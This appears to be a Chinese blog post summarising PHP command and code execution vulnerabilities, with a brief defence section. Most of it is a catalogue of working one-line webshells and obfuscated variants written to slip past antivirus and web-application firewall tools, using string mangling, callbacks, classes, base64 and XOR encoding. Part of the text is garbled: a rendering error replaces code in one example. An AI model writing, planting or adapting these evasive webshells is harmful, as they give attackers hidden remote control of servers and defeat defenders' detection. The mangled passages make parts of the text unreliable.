Webshell总结

命令执行漏洞
命令执行直接调用操作系统命令。其原理是,在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,造成命令执行漏洞。

command1&command2 两个命令同时执行
command1&&command2 只有前面命令执行成功,后面命令才继续执行
command1;command2 不管前面命令执行成功没有,后面的命令继续执行
command1||command2 顺序执行多条命令,当碰到执行正确的命令后将不执行后面的命令

PHP中常见命令执行函数
system():执行一个外部的应用程序的输入并显示输出的结果
exec():执行一个外部的应用程序,但不显示输出的结果
passthru():执行一个系统命令并显示原始的输出
shell_exec():执行shell命令并返回输出的结果的字符串
`` :与shell_exec函数的功能相同
popen()
proc_open()
pcntl_exec():需要开启pcntl扩展

命令执行漏洞防御:
进入命令执行的函数或者方法之前,对参数进行过滤
参数的值尽量用引号包裹(单引号变量不解析),并在拼接前调用addslashes进行转义
禁止能执行系统命令的含食宿,可在php的配置文件中设置 disable_functions
代码执行漏洞
应用程序在调用一些能够将字符串转换为代码的函数(如PHP中的eval(),eval可以将字符串当做函数进行执行)时,没有考虑用户是否控制这个字符串,将造成代码执行漏洞。一般很难通过黑盒查找漏洞,大部分都是根据源代码判断代码执行漏洞。

PHP中代码执行函数
eval():将字符串当做函数进行执行(需要传入一个完整的语句),执行后会输出一个hello
assert():判断是否为字符串,是则当成代码执行。php官方在php7中更改了assert函数。在php7.0.29之后的版本不支持动态调用。

7.0之后的demo:
call_user_func():回调函数,可以使用is_callable查看是否可以进行调用
call_user_fuc_array():回调函数,参数为数组
create_function():创建匿名函数
preg_replace():当php版本小于7时,当为 /e 时代码会执行
array_map():为数组的每个元素应用回调函数
array_filter():依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含,在返回的结果数组中。数组的键名保留不变。

usort():使用自定义函数对数组进行排序

${}:中间的php代码将会被解析

一句话木马就是利用的代码执行漏洞:

<?php @eval($_POST[x]);?>

绕过知识:

1 .字符串变形
字符串变形多数用于 BYPASS 安全狗,相当对于 D 盾,安全狗更加重视”形”
一个特殊的变形就能绕过安全狗,看看 PHP 手册,有着很多关于操作字符串的函数
ucwords() //函数把字符串中每个单词的首字符转换为大写。
ucfirst() //函数把字符串中的首字符转换为大写。
trim() //函数从字符串的两端删除空白字符和其他预定义字符。
substr_replace() //函数把字符串的一部分替换为另一个字符串
substr() //函数返回字符串的一部分。
strtr() //函数转换字符串中特定的字符。
strtoupper() //函数把字符串转换为大写。
strtolower() //函数把字符串转换为小写。
strtok() //函数把字符串分割为更小的字符串
str_rot13() //函数对字符串执行 ROT13 编码。
由于 PHP 的灵活性操作字符串的函数很多,我这里就不一一列举了
用 substr_replace() 函数变形 assert 达到免杀的效果

<?php $a = substr_replace("assexx","rt",4); $a($_POST['x']); ?>

2.定义函数绕过
定义一个函数把关键词分割达到 bypass 效果

<?php function kdog($a){ $a($_POST['x']); } kdog(assert); ?>

反之

<?php function kdog($a){ assert($a); } kdog($_POST[x]); ?>
  1. 回调函数
    call_user_func_array()
    call_user_func()
    array_filter()
    array_walk()
    array_map()
    registregister_shutdown_function()
    register_tick_function()
    filter_var()
    filter_var_array()
    uasort()
    uksort()
    array_reduce()
    array_walk()
    array_walk_recursive()
    回调函数大部分已经被安全软件加入全家桶套餐 所以找到一个生僻的不常用的回调函数来执行 比如
<?php forward_static_call_array(assert,array($_POST[x])); ?>

这个函数能过狗,但是 D 盾显示是一级

  1. 回调函数变形
    前面说过众多回调函数已经被加入豪华套餐了,怎么绕过呢,其实也很简单 那就是定义个函数 或者类来调用
    定义一个函数
<?php function test($a,$b){ array_map($a,$b); } test(assert,array($_POST['x'])); ?>

定义一个类

<?php class loveme { var $a; var $b; function __construct($a,$b) { $this->a=$a; $this->b=$b; } function test() { array_map($this->a,$this->b); } } $p1=new loveme(assert,array($_POST['x'])); $p1->test(); ?>
  1. 特殊字符干扰
    特殊字符干扰,要求是能干扰到杀软的正则判断,还要代码能执行, 网上广为流传的连接符
    初代版本
<?php $a = $_REQUEST['a']; $b = null; eval($b.$a); ?>

不过已经不能免杀了,利用适当的变形即可免杀 如

<?php $a = $_POST['a']; $b = "\n"; eval($b.=$a); ?>

其他方法大家尽情发挥如”\r\n\t”, 函数返回,类,等等
除了连接符号 还有个命名空间的东西 \ 具体大家可以看看 php 手册

<?php function dog($a){ \assert($a); } dog($_POST[x]); ?>

当然还有其他的符号熟读 PHP 手册就会有不一样的发现,对于其他语言例如java、python、asp需要另外看。

6.数组
把执行代码放入数组中执行绕过

<?php $a = substr_replace("assexx","rt",4); $b=[''=>$a($_POST['q'])]; ?>

多维数组

<?php $b = substr_replace("assexx","rt",4); $a = array($arrayName = array('a' => $b($_POST['q']))); ?>

  1. 说到类肯定要搭配上魔术方法比如 __destruct(),__construct()
    直接上代码
<?php class me { public $a = ''; function __destruct(){ assert("$this->a"); } } $b = new me; $b->a = $_POST['x']; ?>

用类把函数包裹,D 盾对类查杀较弱

8.编码绕过
用 php 的编码函数,或者用异或等等
简单的 base64_decode, 其中因为他的正则匹配可以加入一些下划线干扰杀软

<?php $a = base64_decode("YXNz+ZX____J____0"); $a($_POST[x]); ?>

异或

<?php $a= ("!"^"@").'ssert'; $a($_POST[x]); ?>

9.无字符特征马
对于无特征马这里我的意思是 无字符特征,靠自己发挥聪明才智(づ ̄3 ̄)
1.利用异或, 编码等方式 例如 p 神博客的

<?php $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert'; $__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); //$__='_POST' ; $___=$$__; $_($___[_]); // assert($_POST[_]); 1.利用正则匹配字符 如 Tab 等 然后转换为字符 2.利用 POST 包获取关键参数执行 例如 <?php $decrpt = $_POST['x']; $arrs = explode("|", $decrpt)[1]; $arrs = explode("|", base64_decode($arrs)); call_user_func($arrs[0],$arrs[1]); 总结:PHP7.1 后 webshell 何去何从 在 php7.1 后面我们已经不能使用强大的 assert 函数了用 eval 将更加注重特殊的调用方法和一些字符干扰, 后期大家可能更加倾向使用大马 对于安全狗杀形,d 盾杀参的思路来绕过。生僻的回调函数, 特殊的加密方式, 以及关键词的后传入都是不错的选择。 对于关键词的后传入对免杀安全狗,d 盾,河马 等等都是不错的,后期对于菜刀的轮子,也要走向高度的自定义化 用户可以对传出的 post 数据进行自定义脚本加密,再由 webshell 进行解密获取参数,那么以现在的软 WAF 查杀能力 几乎为 0,安全软件也需要与时俱进了。 ?>

绕过总结来自:https://www.cnblogs.com/linuxsec/articles/10420025.html

隐藏POST和GET
在php7.1之后,如果我们转换思路,不再纠结于隐藏assert,eval等命令执行函数(因为assert变成了一种语言结构,也无法隐藏了,无需隐藏了),而是直接面对eval,在我上述的例子中大家很容易看到,我就随便往eval中传了一个参数“ccc",D盾就直接报已知后门了,这足以说明D盾对传入eavl参数的敏感性太高了。那么此时,我们隐藏一下我们一句话木马中常用和必须的GET和POST就有必要了。于是编写如下木马:(注明:此木马D盾会报一级可疑)
$a = “~+d()”^"!{+{}";
$b = KaTeX parse error: Expected '}', got 'EOF' at end of input: {a}[a];
eval($b);
简单解释一下:
变量a的值我是利用异或赋值的,‘a的值我是利用异或赋值的,¬¬¬¬‘a = “+d()”"!{+{}";`,而字符串`"+d()""!{+{}"异或的结果为_POST`

测试连接成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值